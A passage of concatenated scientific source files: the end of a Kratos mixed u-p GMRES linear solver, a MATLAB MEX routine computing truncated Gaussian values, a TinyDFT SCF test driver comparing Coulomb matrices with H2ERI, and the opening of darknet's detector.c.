TSparseSpaceType::ScaleAndAdd (1.00, b, -1.00, r); //r = b - r
//apply preconditioner and overwrite r
SolveBlockPreconditioner (r,r);
const double rel_tol = tol*normb;
double beta = TSparseSpaceType::TwoNorm (r);
if (beta <= rel_tol) //finalize!
{
tol = beta / normb;
max_iter = 0;
return 0;
}
unsigned int j;
// int err = 0;
std::vector< VectorType > V (m+1);
for (j = 0; j <= m; ++j)
V[j].resize (dim,false);
j = 1;
while (j <= max_iter)
{
TSparseSpaceType::Assign (V[0], 1.0/beta, r); //V[0] = r /(T)beta;
TSparseSpaceType::SetToZero (s);
s[0] = beta;
for (unsigned int i = 0; (i < m) && (j <= max_iter); ++i, ++j)
{
TSparseSpaceType::Mult (A,V[i],w); //w = A*V[i];
//apply preconditioner and overwrite r
SolveBlockPreconditioner (w,w);
for (unsigned int k = 0; k <= i; k++)
{
H (k, i) = TSparseSpaceType::Dot (V[k], w);
w -= H (k, i) * V[k];
}
const double normw = TSparseSpaceType::TwoNorm (w);
H (i+1, i) = normw;
/*KRATOS_WATCH(normw);*/
// "Happy breakdown": w vanished, so the Krylov subspace is invariant and already contains the solution
if (normw == 0)
TSparseSpaceType::Copy (V[i+1], w); //V[i+1] = w;
else
TSparseSpaceType::Assign (V[i+1], 1.0/normw, w); //V[i+1] = w / normw;
for (unsigned int k = 0; k < i; k++)
ApplyPlaneRotation (H (k,i), H (k+1,i), cs (k), sn (k) );
GeneratePlaneRotation (H (i,i), H (i+1,i), cs (i), sn (i) );
ApplyPlaneRotation (H (i,i), H (i+1,i), cs (i), sn (i) );
ApplyPlaneRotation (s (i), s (i+1), cs (i), sn (i) );
beta = fabs (s (i+1) );
std::cout << "iter = " << j << " estimated res ratio = " << beta << std::endl;
// KRATOS_WATCH (beta);
if (beta <= rel_tol)
{
this->Update (y, x, i, H, s, V);
return 0;
}
}
this->Update (y,x, m - 1, H, s, V);
//r = b - Ax
TSparseSpaceType::Mult (A,x,r);
TSparseSpaceType::ScaleAndAdd (1.00, b, -1.00, r); //r = b - r
beta = TSparseSpaceType::TwoNorm (r);
std::cout << "number of iterations at convergence = " << j << std::endl;
if (beta < rel_tol)
{
return 0;
}
++restart;
}
// err = 1;
return 1;
}
//this function extracts from a vector which has the size of the
//overall r, the part that corresponds to u-dofs
void GetUPart (const VectorType& rtot, VectorType& ru)
{
if (ru.size() != mother_indices.size() )
ru.resize (mother_indices.size(), false);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(ru.size()); i++)
ru[i] = rtot[mother_indices[i]];
}
//this function extracts from a vector which has the size of the
//overall r, the part that corresponds to p-dofs
void GetPPart (const VectorType& rtot, VectorType& rp)
{
if (rp.size() != mpressure_indices.size() )
rp.resize (mpressure_indices.size(), false);
#pragma omp parallel for
for (int i = 0; i<static_cast<int>(rp.size()); i++)
rp[i] = rtot[mpressure_indices[i]];
}
void WriteUPart (VectorType& rtot, const VectorType& ru)
{
#pragma omp parallel for
for (int i = 0; i< static_cast<int>(ru.size()); i++)
rtot[mother_indices[i]] = ru[i];
}
void WritePPart (VectorType& rtot, const VectorType& rp)
{
#pragma omp parallel for
for (int i = 0; i< static_cast<int>(rp.size()); i++)
rtot[mpressure_indices[i]] = rp[i];
}
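// Builds a "lumped" diagonal whose i-th entry is the 2-norm of row i of A
// (sqrt of the sum of squared entries), used as an inexpensive stand-in for
// Diag(K) in the preconditioner rather than the literal matrix diagonal.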
void ComputeDiagonalByLumping (SparseMatrixType& A,VectorType& diagA)
{
if (diagA.size() != A.size1() )
diagA.resize (A.size1() );
//get access to A data
const std::size_t* index1 = A.index1_data().begin();
// const std::size_t* index2 = A.index2_data().begin();
const double* values = A.value_data().begin();
#pragma omp parallel for
for (int i=0; i< static_cast<int>(A.size1()); i++)
{
unsigned int row_begin = index1[i];
unsigned int row_end = index1[i+1];
double temp = 0.0;
for (unsigned int j=row_begin; j<row_end; j++)
temp += values[j]*values[j];
diagA[i] = sqrt(temp);
}
}
double CheckMatrix (SparseMatrixType& A)
{
//get access to A data
const std::size_t* index1 = A.index1_data().begin();
const std::size_t* index2 = A.index2_data().begin();
const double* values = A.value_data().begin();
double norm = 0.0;
for (unsigned int i=0; i<A.size1(); i++)
{
unsigned int row_begin = index1[i];
unsigned int row_end = index1[i+1];
if (row_end - row_begin == 0)
std::cout << "line " << i << " has no elements" << std::endl;
//KRATOS_THROW_ERROR(std::logic_error, "line found with no entries on line ",i)
for (unsigned int j=row_begin; j<row_end; j++)
{
if (index2[j]>=A.size2() )
KRATOS_THROW_ERROR (std::logic_error, "column index out of the range of A","")
norm += values[j]*values[j];
}
}
return sqrt (norm);
}
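// One sweep of the block preconditioner for the saddle-point system
// [K G; D S]. The steps performed below are:
// u = K^{-1} * r_u (velocity solve)
// r_p = r_p - D * u (pressure residual update)
// p = S^{-1} * r_p (pressure solve on the Schur complement)
// u = u + Diag(K)^{-1} * G * p (velocity correction, as implemented here)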
void SolveBlockPreconditioner (const VectorType& rtot, VectorType& x)
{
boost::numeric::ublas::noalias(mp) = boost::numeric::ublas::zero_vector<double>(mpressure_indices.size());
boost::numeric::ublas::noalias(mu) = boost::numeric::ublas::zero_vector<double>(mother_indices.size());
VectorType uaux (mother_indices.size() );
VectorType paux (mpressure_indices.size() );
//get diagonal of K (to be removed)
VectorType diagK (mother_indices.size() );
ComputeDiagonalByLumping (mK,diagK);
//get the u and p residuals
GetUPart (rtot,mru);
GetPPart (rtot,mrp);
//solve u block
mpsolver_UU_block->Solve (mK,mu,mru);
//correct pressure block
//rp -= D*u
TSparseSpaceType::Mult (mD,mu,paux);
TSparseSpaceType::UnaliasedAdd (mrp,-1.0,paux);
//solve pressure
//p = S^{-1} * rp
mpsolver_PP_block->Solve (mS,mp,mrp);
//correct u block
//u += Diag(K)^{-1} * G * p
TSparseSpaceType::Mult (mG,mp,uaux);
#pragma omp parallel for
for (int i=0; i< static_cast<int>(mu.size()); i++)
mu[i] += uaux[i]/diagK[i];
//write back solution
WriteUPart (x,mu);
WritePPart (x,mp);
}
/// Compute the Pressure System Matrix
/**
* Compute the system matrix A = L - D*Inv(Diag(S))*G. The product is
* accumulated in arbitrary column order, so each row is built in a
* temporary buffer, its column indices are sorted, and the result is
* copied into the input matrix A.
*/
void CalculateShurComplement (
SparseMatrixType& A,
SparseMatrixType& K,
SparseMatrixType& rG,
SparseMatrixType& rD,
SparseMatrixType& rL,
VectorType& diagK
)
{
// Retrieve matrices
// Compute Inv(Diag(S))
VectorType& rIDiagS = diagK;
//KRATOS_WATCH(804)
typedef DenseVector<int> IndexVector;
//typedef typename SparseMatrixType::iterator1 OuterIt;
//typedef typename SparseMatrixType::iterator2 InnerIt;
typedef typename boost::numeric::ublas::matrix_row< SparseMatrixType > RowType;
int DiagSize = int (diagK.size()); // to avoid comparison between int & unsigned int
#pragma omp parallel for
for ( int i = 0; i < DiagSize; i++)
rIDiagS[i] = 1.0/diagK[i];
OpenMPUtils::PartitionVector Partition;
int NumThreads = OpenMPUtils::GetNumThreads();
OpenMPUtils::DivideInPartitions (A.size1(),NumThreads,Partition);
#pragma omp parallel
{
int k = OpenMPUtils::ThisThread();
VectorType CurrentRow(K.size2());
for (unsigned int i = 0; i < rL.size1(); i++) CurrentRow[i] = 0.0;
IndexVector Next = IndexVector(rL.size1());
//IndexVector& Next = *pNext; // Keeps track of which columns were filled
for (unsigned int m=0; m < rL.size1(); m++) Next[m] = -1;
std::size_t NumTerms = 0; // Full positions in a row
std::vector<unsigned int> UsedCols = std::vector<unsigned int>();
// std::vector<unsigned int>& UsedCols = *pUsedCols;
UsedCols.reserve (rL.size1());
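// 'Next' acts as an intrusive singly linked list over column indices:
// 'head' holds the most recently touched column, Next[col] points to the
// previously touched one, -1 marks "not in the row" and the initial head
// value of -2 terminates the list. This gives O(1) membership tests while
// accumulating each sparse row.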
for ( int RowIndex = Partition[k] ;
RowIndex != Partition[k+1] ; RowIndex++ )
{
RowType RowD (rD,RowIndex);
RowType RowL (rL,RowIndex);
int head = -2;
std::size_t Length = 0;
// Write L in A
for ( typename RowType::iterator ItL = RowL.begin();
ItL != RowL.end(); ItL++ )
{
CurrentRow (ItL.index() ) = *ItL;
if ( Next[ItL.index()] == -1)
{
Next[ItL.index()] = head;
head = ItL.index();
Length++;
}
}
// Subtract D*Inv(Diag(S))*G
for ( typename RowType::iterator ItD = RowD.begin();
ItD != RowD.end(); ItD++ )
{
RowType RowG (rG,ItD.index() );
for ( typename RowType::iterator ItG = RowG.begin();
ItG != RowG.end(); ItG++ )
{
CurrentRow[ItG.index()] -= (*ItD) * rIDiagS[ItD.index()] * (*ItG);
if ( Next[ItG.index()] == -1)
{
Next[ItG.index()] = head;
head = ItG.index();
Length++;
}
}
}
// Identify full terms for ordering
for ( std::size_t i = 0; i < Length; i++)
{
if ( Next[head] != -1 )
{
UsedCols.push_back (head);
NumTerms++;
}
int temp = head;
head = Next[head];
// Clear 'Next' for next iteration
Next[temp] = -1;
}
// Sort Column indices
SortCols (UsedCols,NumTerms);
// Fill matrix row, then clean temporary variables.
RowType RowA (A,RowIndex);
std::size_t n = 0;
unsigned int Col;
for ( typename RowType::iterator ItA = RowA.begin(); ItA != RowA.end(); ItA++)
{
Col = UsedCols[n++];
*ItA = CurrentRow[Col];
CurrentRow[Col] = 0;
}
NumTerms = 0;
UsedCols.resize (0,false);
}
}
//KRATOS_WATCH(896)
//add stabilization matrix L
/* const std::size_t* L_index1 = rL.index1_data().begin();
const std::size_t* L_index2 = rL.index2_data().begin();
const double* L_values = rL.value_data().begin();
for (unsigned int i=0; i<rL.size1(); i++)
{
unsigned int row_begin = L_index1[i];
unsigned int row_end = L_index1[i+1];
diagA[i] = 0.0;
for (unsigned int j=row_begin; j<row_end; j++)
{
unsigned int col = L_index2[j];
rS(i,col) += L_values[j];
}
}*/
}
/// Helper function for the system matrix routines: comb-style sort of a column index list
void SortCols (
std::vector<unsigned int>& ColList,
std::size_t& NumCols)
{
bool swap = true;
unsigned int d = NumCols;
int temp;
while ( swap || d > 1 )
{
swap = false;
d = (d+1) /2;
for ( unsigned int i=0; i< (NumCols - d); i++)
if ( ColList[i+d] < ColList[i] )
{
temp = ColList[i+d];
ColList[i+d] = ColList[i];
ColList[i] = temp;
swap = true;
}
}
}
/// Identify non-zero terms in the system matrix
void ConstructSystemMatrix(
SparseMatrixType& A,
SparseMatrixType& rG,
SparseMatrixType& rD,
SparseMatrixType& rL
)
{
typedef DenseVector<int> IndexVector;
typedef OpenMPUtils::PartitionVector PartitionVector;
//typedef typename SparseMatrixType::iterator1 OuterIt;
//typedef typename SparseMatrixType::iterator2 InnerIt;
typedef typename boost::numeric::ublas::matrix_row< SparseMatrixType > RowType;
PartitionVector Partition;
int NumThreads = OpenMPUtils::GetNumThreads();
OpenMPUtils::DivideInPartitions(A.size1(),NumThreads,Partition);
for ( int k = 0 ; k < NumThreads ; k++)
{
// This code is serial, the pragma is here to ensure that each
// row block is assigned to the processor that will fill it
#pragma omp parallel
if ( OpenMPUtils::ThisThread() == k)
{
// Kratos::shared_ptr< IndexVector > pNext( new IndexVector(rL.size1() ) );
// IndexVector& Next = *pNext; // Keeps track of which columns were filled
IndexVector Next(rL.size1());
for (unsigned int m = 0; m < rL.size1(); m++) Next[m] = -1;
std::size_t NumTerms = 0; // Full positions in a row
std::vector<unsigned int> UsedCols;
// std::vector<unsigned int>& UsedCols = *pUsedCols;
UsedCols.reserve(rL.size1());
for ( int RowIndex = Partition[k] ;
RowIndex != Partition[k+1] ; RowIndex++ )
{
RowType RowD(rD,RowIndex);
RowType RowL(rL,RowIndex);
int head = -2;
std::size_t Length = 0;
// Terms filled by L
for ( typename RowType::iterator ItL = RowL.begin();
ItL != RowL.end(); ItL++ )
{
if ( Next[ItL.index()] == -1)
{
Next[ItL.index()] = head;
head = ItL.index();
Length++;
}
}
// Additional terms due to D*Inv(Diag(S))*G
for ( typename RowType::iterator ItD = RowD.begin();
ItD != RowD.end(); ItD++ )
{
RowType RowG(rG,ItD.index());
for ( typename RowType::iterator ItG = RowG.begin();
ItG != RowG.end(); ItG++ )
{
if ( Next[ItG.index()] == -1)
{
Next[ItG.index()] = head;
head = ItG.index();
Length++;
}
}
}
// Identify full terms for ordering
for ( std::size_t i = 0; i < Length; i++)
{
if ( Next[head] != -1 )
{
UsedCols.push_back(head);
NumTerms++;
}
int temp = head;
head = Next[head];
// Clear 'Next' for next iteration
Next[temp] = -1;
}
// Sort Column indices
SortCols(UsedCols,NumTerms);
// Store row in matrix, clean temporary variables
for ( unsigned int i = 0; i < NumTerms; i++)
{
A.push_back(RowIndex,UsedCols[i],0);
}
NumTerms = 0;
UsedCols.resize(0,false);
}
}
}
}
///@}
///@name Private Operations
///@{
///@}
///@name Private Access
///@{
///@}
///@name Private Inquiry
///@{
///@}
///@name Un accessible methods
///@{
///@}
}; // Class MixedUPLinearSolver
///@}
///@name Type Definitions
///@{
///@}
///@name Input and output
///@{
/// input stream function
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
inline std::istream& operator >> (std::istream& IStream,
MixedUPLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>& rThis)
{
return IStream;
}
/// output stream function
template<class TSparseSpaceType, class TDenseSpaceType, class TPreconditionerType, class TReordererType>
inline std::ostream& operator << (std::ostream& rOStream,
const MixedUPLinearSolver<TSparseSpaceType, TDenseSpaceType,TPreconditionerType, TReordererType>& rThis)
{
rThis.PrintInfo (rOStream);
rOStream << std::endl;
rThis.PrintData (rOStream);
return rOStream;
}
///@}
} // namespace Kratos.
#endif // KRATOS_MIXEDUP_SOLVER_H_INCLUDED defined
|
calcCondQB.c | #include <mex.h>
#include <math.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
int min(int A, int B) {
if (A < B) {
return A;
} else {
return B;
}
}
int max(int A, int B) {
if (A > B) {
return A;
} else {
return B;
}
}
void mexFunction(int nlhs, mxArray *plhs[], int nrhs, const mxArray *prhs[]) {
/* Input variables */
double *mu = mxGetPr(prhs[0]);
double *var = mxGetPr(prhs[1]);
int numRows = (int) mxGetScalar(prhs[2]);
int numBounds = (int) mxGetScalar(prhs[3]);
int numColumnsShape = (int) mxGetScalar(prhs[4]);
int numColumnsPred = (int) mxGetScalar(prhs[5]);
int *colA = (int*) mxGetData(prhs[6]);
double *colAFac = mxGetPr(prhs[7]);
int *colB = (int*) mxGetData(prhs[8]);
double *colBFac = mxGetPr(prhs[9]);
double eps = mxGetScalar(prhs[10]);
/* intern variables and pointers */
float* condQB = NULL;
int* cmin = NULL;
int* cmax = NULL;
float factor,varinv,varAvg,muAvg;
int i,j,k,idx,idx2,numNotZero,muFloor,startVal,stopVal,idxA,idxB;
/* 2-D output matrix with [numRows, numBounds*numColumnsPred] */
plhs[0] = mxCreateNumericMatrix(numRows,numBounds*numColumnsPred,mxSINGLE_CLASS,mxREAL);
condQB = (float *) mxGetData(plhs[0]); /* single-class data, so mxGetData */
plhs[1] = mxCreateNumericMatrix(1,numBounds*numColumnsPred,mxINT32_CLASS,mxREAL);
cmin = (int *)mxGetData(plhs[1]);
plhs[2] = mxCreateNumericMatrix(1,numBounds*numColumnsPred,mxINT32_CLASS,mxREAL);
cmax = (int *)mxGetData(plhs[2]);
/* evaluate the truncated Gaussian q(B) for every bound/column pair */
#pragma omp parallel for private(j,i,idx,idx2,startVal,stopVal,varinv,numNotZero,muFloor,factor,varAvg,muAvg,idxA,idxB)
for (k=0; k < numBounds; k++) {
for (j=0; j < numColumnsPred; j++) {
/*idx = k*numColumnsShape + j;
factor = 1/sqrt(2*3.1415926535897*var[idx]);
muFloor = (int) mu[idx];*/
idx = k*numColumnsPred + j;
idxA = colA[j]+k*numColumnsShape; idxB = colB[j]+k*numColumnsShape;
varAvg = (float) (colAFac[j]*var[idxA] + colBFac[j]*var[idxB]);
muAvg = (float) (colAFac[j]*mu[idxA] + colBFac[j]*mu[idxB]);
factor = 1/sqrtf(2*3.1415926535897*varAvg);
muFloor = (int) muAvg;
/* calculate rows for which the gaussian is larger than threshold */
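/* Inverting factor*exp(-d*d/(2*var)) >= eps gives the cutoff radius
d <= sqrt(-2*var*log(eps/factor)); the expression below folds the factor
into the log as a product instead, which only enlarges the window whenever
factor < 1, i.e. it errs on the safe side for wide Gaussians. */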
numNotZero = (int) ceil(fabs(sqrt(-log(eps*factor)*2*varAvg))); /* fabs: the integer abs() would truncate the double */
startVal = max(muFloor-numNotZero,1);
stopVal = min(muFloor+numNotZero,numRows);
cmin[idx] = startVal-1;
cmax[idx] = stopVal-1;
idx2 = idx*numRows;
varinv = -1/(2*varAvg);
for (i=startVal; i <= stopVal; i++) {
condQB[idx2 + i - 1] = factor*expf(varinv*(i-muAvg)*(i-muAvg));
}
}
}
}
|
test_SCF_lastD.c | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <math.h>
#include <omp.h>
#include "TinyDFT.h"
#include "TinyDFT_typedef.h"
#include "H2ERI.h"
#include "utils.h" // In H2Pack
void TinyDFT_copy_shells_to_H2ERI(TinyDFT_p TinyDFT, H2ERI_p h2eri)
{
h2eri->natom = TinyDFT->natom;
h2eri->nshell = TinyDFT->nshell;
h2eri->shells = (shell_t *) malloc(sizeof(shell_t) * h2eri->nshell);
assert(h2eri->shells != NULL);
simint_initialize_shells(h2eri->nshell, h2eri->shells);
shell_t *src_shells = (shell_t*) TinyDFT->simint->shells;
shell_t *dst_shells = h2eri->shells;
for (int i = 0; i < h2eri->nshell; i++)
{
simint_allocate_shell(src_shells[i].nprim, &dst_shells[i]);
simint_copy_shell(&src_shells[i], &dst_shells[i]);
}
}
// Functions from AnySCF
void TinyDFT_SCF(TinyDFT_p TinyDFT, const int max_iter, const int J_op, const int K_op)
{
// Start SCF iterations
printf("Self-Consistent Field iteration started...\n");
printf("Nuclear repulsion energy = %.10lf\n", TinyDFT->E_nuc_rep);
TinyDFT->iter = 0;
TinyDFT->max_iter = max_iter;
double E_prev = 0.0, E_curr = 0.0, E_delta = 19241112.0;
int mat_size = TinyDFT->mat_size;
int xf_id = TinyDFT->xf_id;
int xf_family = TinyDFT->xf_family;
double *Hcore_mat = TinyDFT->Hcore_mat;
double *S_mat = TinyDFT->S_mat;
double *X_mat = TinyDFT->X_mat;
double *J_mat = TinyDFT->J_mat;
double *K_mat = TinyDFT->K_mat;
double *XC_mat = TinyDFT->XC_mat;
double *F_mat = TinyDFT->F_mat;
double *Cocc_mat = TinyDFT->Cocc_mat;
double *D_mat = TinyDFT->D_mat;
double *E_nuc_rep = &TinyDFT->E_nuc_rep;
double *E_one_elec = &TinyDFT->E_one_elec;
double *E_two_elec = &TinyDFT->E_two_elec;
double *E_HF_exchange = &TinyDFT->E_HF_exchange;
double *E_DFT_XC = &TinyDFT->E_DFT_XC;
int J_direct = 0, K_direct = 0, JK_direct = 0;
int J_denfit = 0, K_denfit = 0, K_xc = 0, xc_hybrid = 0;
if (xf_family == FAMILY_HYB_GGA) xc_hybrid = 1;
if (J_op == 0) J_direct = 1;
if (J_op == 1) J_denfit = 1;
if (K_op == 0) K_direct = 1;
if (K_op == 1) K_denfit = 1;
if (K_op == 2) K_xc = 1;
if (xc_hybrid == 1)
{
if (J_direct == 1) K_direct = 1;
if (J_denfit == 1) K_denfit = 1;
}
JK_direct = J_direct & K_direct;
double HF_x_coef = 0.0; // default to no HF exchange; only B3LYP / B3LYP5 are recognized below
if (xf_id == HYB_GGA_XC_B3LYP || xf_id == HYB_GGA_XC_B3LYP5) HF_x_coef = 0.2;
while ((TinyDFT->iter < TinyDFT->max_iter) && (fabs(E_delta) >= TinyDFT->E_tol))
{
printf("--------------- Iteration %d ---------------\n", TinyDFT->iter);
double st0, et0, st1, et1, st2;
double J_time = 0, K_time = 0, XC_time = 0;
st0 = get_wtime_sec();
// Build the Fock matrix
J_time = 0.0;
K_time = 0.0;
XC_time = 0.0;
if (JK_direct == 1)
{
st1 = get_wtime_sec();
TinyDFT_build_JKmat(TinyDFT, D_mat, J_mat, K_mat);
st2 = get_wtime_sec();
J_time = 0.5 * (st2 - st1);
K_time = 0.5 * (st2 - st1);
}
if (JK_direct == 0 && J_direct == 1)
{
st1 = get_wtime_sec();
TinyDFT_build_JKmat(TinyDFT, D_mat, J_mat, NULL);
st2 = get_wtime_sec();
J_time = st2 - st1;
}
if (J_denfit == 1)
{
st1 = get_wtime_sec();
TinyDFT_build_JKmat_DF(TinyDFT, D_mat, Cocc_mat, J_mat, NULL);
st2 = get_wtime_sec();
J_time = st2 - st1;
}
if (JK_direct == 0 && K_direct == 1)
{
st1 = get_wtime_sec();
TinyDFT_build_JKmat(TinyDFT, D_mat, NULL, K_mat);
st2 = get_wtime_sec();
K_time = st2 - st1;
}
if (K_denfit == 1)
{
st1 = get_wtime_sec();
TinyDFT_build_JKmat_DF(TinyDFT, D_mat, Cocc_mat, NULL, K_mat);
st2 = get_wtime_sec();
K_time = st2 - st1;
}
if (K_xc == 1)
{
st1 = get_wtime_sec();
*E_DFT_XC = TinyDFT_build_XC_mat(TinyDFT, D_mat, XC_mat);
st2 = get_wtime_sec();
XC_time = st2 - st1;
}
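// Assemble the closed-shell Fock matrix for the selected operators:
// F = Hcore + 2J - K (HF exchange, K_op 0/1),
// F = Hcore + 2J + Vxc (pure DFT functional),
// F = Hcore + 2J + Vxc - c_x*K (hybrid functional, c_x = HF_x_coef).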
if (K_op == 0 || K_op == 1)
{
#pragma omp parallel for simd
for (int i = 0; i < mat_size; i++)
F_mat[i] = Hcore_mat[i] + 2 * J_mat[i] - K_mat[i];
}
if (K_op == 2 && xc_hybrid == 0)
{
#pragma omp parallel for simd
for (int i = 0; i < mat_size; i++)
F_mat[i] = Hcore_mat[i] + 2 * J_mat[i] + XC_mat[i];
}
if (K_op == 2 && xc_hybrid == 1)
{
#pragma omp parallel for simd
for (int i = 0; i < mat_size; i++)
F_mat[i] = Hcore_mat[i] + 2 * J_mat[i] + XC_mat[i] - HF_x_coef * K_mat[i];
}
et1 = get_wtime_sec();
printf(
"* Build Fock matrix : %.3lf (s), J, K, XC = %.3lf, %.3lf, %.3lf (s)\n",
et1 - st0, J_time, K_time, XC_time
);
// Calculate new system energy
st1 = get_wtime_sec();
if (K_direct == 1 || K_denfit == 1)
{
TinyDFT_calc_HF_energy(
mat_size, D_mat, Hcore_mat, J_mat, K_mat,
E_one_elec, E_two_elec, E_HF_exchange
);
} else {
TinyDFT_calc_HF_energy(
mat_size, D_mat, Hcore_mat, J_mat, NULL,
E_one_elec, E_two_elec, NULL
);
}
E_curr = (*E_nuc_rep) + (*E_one_elec) + (*E_two_elec);
if (K_op == 0 || K_op == 1) E_curr += (*E_HF_exchange);
if (K_op == 2) E_curr += (*E_DFT_XC);
if (K_op == 2 && xc_hybrid == 1) E_curr += HF_x_coef * (*E_HF_exchange);
et1 = get_wtime_sec();
printf("* Calculate energy : %.3lf (s)\n", et1 - st1);
E_delta = E_curr - E_prev;
E_prev = E_curr;
// CDIIS acceleration (Pulay mixing)
st1 = get_wtime_sec();
TinyDFT_CDIIS(TinyDFT, X_mat, S_mat, D_mat, F_mat);
et1 = get_wtime_sec();
printf("* CDIIS procedure : %.3lf (s)\n", et1 - st1);
// Diagonalize and build the density matrix
st1 = get_wtime_sec();
TinyDFT_build_Dmat_eig(TinyDFT, F_mat, X_mat, D_mat, Cocc_mat);
et1 = get_wtime_sec();
printf("* Build density matrix : %.3lf (s)\n", et1 - st1);
et0 = get_wtime_sec();
printf("* Iteration runtime = %.3lf (s)\n", et0 - st0);
printf("* Energy = %.10lf", E_curr);
if (TinyDFT->iter > 0)
{
printf(", delta = %e\n", E_delta);
} else {
printf("\n");
E_delta = 19241112.0; // Prevent the SCF exit after 1st iteration when no SAD initial guess
}
TinyDFT->iter++;
}
printf("--------------- SCF iterations finished ---------------\n");
printf("Start checking accuracy of Coulomb matrix construction\n");
double *J_mat_test = (double *) malloc_aligned(DBL_MSIZE * TinyDFT->mat_size, 64);
double Jnorm, err_h2eri5, err_h2eri7, err_df;
// Direct method
TinyDFT_build_JKmat(TinyDFT, D_mat, J_mat, NULL);
Jnorm = 0.0;
#pragma omp simd reduction(+:Jnorm)
for (int i = 0; i < mat_size; i++) Jnorm += J_mat[i] * J_mat[i];
Jnorm = sqrt(Jnorm);
printf("Direct method constructed J matrix fro-norm = %e\n", Jnorm);
// H2ERI 1e-5
H2ERI_p h2eri5;
H2ERI_init(&h2eri5, 1e-10, 1e-10, 1e-5);
TinyDFT_copy_shells_to_H2ERI(TinyDFT, h2eri5);
H2ERI_process_shells(h2eri5);
H2ERI_partition(h2eri5);
H2ERI_build_H2(h2eri5, 0);
H2ERI_build_Coulomb(h2eri5, D_mat, J_mat_test);
err_h2eri5 = 0;
#pragma omp simd reduction(+:err_h2eri5)
for (int i = 0; i < mat_size; i++)
{
double diff = J_mat_test[i] - J_mat[i];
err_h2eri5 += diff * diff;
}
err_h2eri5 = sqrt(err_h2eri5) / Jnorm;
printf("H2ERI with 1e-5 AOT constructed J relative error = %e\n", err_h2eri5);
H2ERI_destroy(h2eri5);
// H2ERI 1e-7
H2ERI_p h2eri7;
H2ERI_init(&h2eri7, 1e-10, 1e-10, 1e-7);
TinyDFT_copy_shells_to_H2ERI(TinyDFT, h2eri7);
H2ERI_process_shells(h2eri7);
H2ERI_partition(h2eri7);
H2ERI_build_H2(h2eri7, 0);
H2ERI_build_Coulomb(h2eri7, D_mat, J_mat_test);
err_h2eri7 = 0;
#pragma omp simd reduction(+:err_h2eri7)
for (int i = 0; i < mat_size; i++)
{
double diff = J_mat_test[i] - J_mat[i];
err_h2eri7 += diff * diff;
}
err_h2eri7 = sqrt(err_h2eri7) / Jnorm;
printf("H2ERI with 1e-7 AOT constructed J relative error = %e\n", err_h2eri7);
H2ERI_destroy(h2eri7);
if (J_op == 0) return;
TinyDFT_build_JKmat_DF(TinyDFT, D_mat, Cocc_mat, J_mat_test, NULL);
err_df = 0;
#pragma omp simd reduction(+:err_df)
for (int i = 0; i < mat_size; i++)
{
double diff = J_mat_test[i] - J_mat[i];
err_df += diff * diff;
}
err_df = sqrt(err_df) / Jnorm;
printf("DF constructed J relative error = %e\n", err_df);
}
void print_usage(const char *argv0)
{
printf("Usage: %s <basis> <xyz> <niter> <direct/DF J> <direct/DF/DFT K/XC> <df_basis> <X-func> <C-func>\n", argv0);
printf(" * direct/DF J: 0 for direct method, 1 for density fitting\n");
printf(" * direct/DF/DFT K/XC: 0 for direct method K, 1 for density fitting K, 2 for DFT XC\n");
printf(" * available XC functions: LDA_X, LDA_C_XA, LDA_C_PZ, LDA_C_PW,\n");
printf(" GGA_X_PBE, GGA_X_B88, GGA_C_PBE, GGA_C_LYP\n");
printf(" HYB_GGA_XC_B3LYP, HYB_GGA_XC_B3LYP5\n");
printf(" Note: if you use hybrid GGA functionals, enter it twice for both <X-func> and <C-func>.\n");
}
int main(int argc, char **argv)
{
if (argc < 6)
{
print_usage(argv[0]);
return 255;
}
double st, et;
int niter, J_op, K_op, use_DF = 0;
niter = atoi(argv[3]);
J_op = atoi(argv[4]);
K_op = atoi(argv[5]);
if (J_op < 0 || J_op > 1) J_op = 0;
if (K_op < 0 || K_op > 2) K_op = 0;
printf("[INFO] Use: ");
if (J_op == 0) printf("direct J, ");
if (J_op == 1) printf("denfit J, ");
if (K_op == 0) printf("direct K\n");
if (K_op == 1) printf("denfit K\n");
if (K_op == 2) printf("DFT XC\n");
// Initialize TinyDFT
TinyDFT_p TinyDFT;
TinyDFT_init(&TinyDFT, argv[1], argv[2]);
// Compute constant matrices and get initial guess for D
st = get_wtime_sec();
TinyDFT_build_Hcore_S_X_mat(TinyDFT, TinyDFT->Hcore_mat, TinyDFT->S_mat, TinyDFT->X_mat);
TinyDFT_build_Dmat_SAD(TinyDFT, TinyDFT->D_mat);
et = get_wtime_sec();
printf("TinyDFT compute Hcore, S, X matrices over, elapsed time = %.3lf (s)\n", et - st);
// Set up density fitting
if (J_op == 1 || K_op == 1)
{
if (argc < 7)
{
printf("You need to provide a density fitting auxiliary basis set!\n");
print_usage(argv[0]);
return 255;
}
use_DF = 1;
// If DF is not needed for the K build, reduce DF memory usage (only the DF
// tensor build becomes slower); otherwise use more DF memory for better K build performance
if (K_op == 1)
{
TinyDFT_setup_DF(TinyDFT, argv[6], argv[2], 0);
} else {
TinyDFT_setup_DF(TinyDFT, argv[6], argv[2], 1);
}
TinyDFT_build_Cocc_from_Dmat(TinyDFT, TinyDFT->D_mat, TinyDFT->Cocc_mat);
}
// Set up XC numerical integral environments
if (K_op == 2)
{
char default_xf_str[6] = "LDA_X";
char default_cf_str[10] = "LDA_C_PW";
char *xf_str = &default_xf_str[0];
char *cf_str = &default_cf_str[0];
if (use_DF == 1 && argc >= 9)
{
xf_str = argv[7];
cf_str = argv[8];
}
if (use_DF == 0 && argc >= 8)
{
xf_str = argv[6];
cf_str = argv[7];
}
st = get_wtime_sec();
TinyDFT_setup_XC_integral(TinyDFT, xf_str, cf_str);
et = get_wtime_sec();
printf("TinyDFT set up XC integral over, elapsed time = %.3lf (s)\n", et - st);
}
// Do SCF calculation
TinyDFT_SCF(TinyDFT, niter, J_op, K_op);
// Free TinyDFT and H2P-ERI
TinyDFT_destroy(&TinyDFT);
return 0;
}
|
detector.c | #include "darknet.h"
static int coco_ids[] = {1,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,19,20,21,22,23,24,25,27,28,31,32,33,34,35,36,37,38,39,40,41,42,43,44,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,67,70,72,73,74,75,76,77,78,79,80,81,82,84,85,86,87,88,89,90};
void train_detector(char *datacfg, char *cfgfile, char *weightfile, int *gpus, int ngpus, int clear)
{
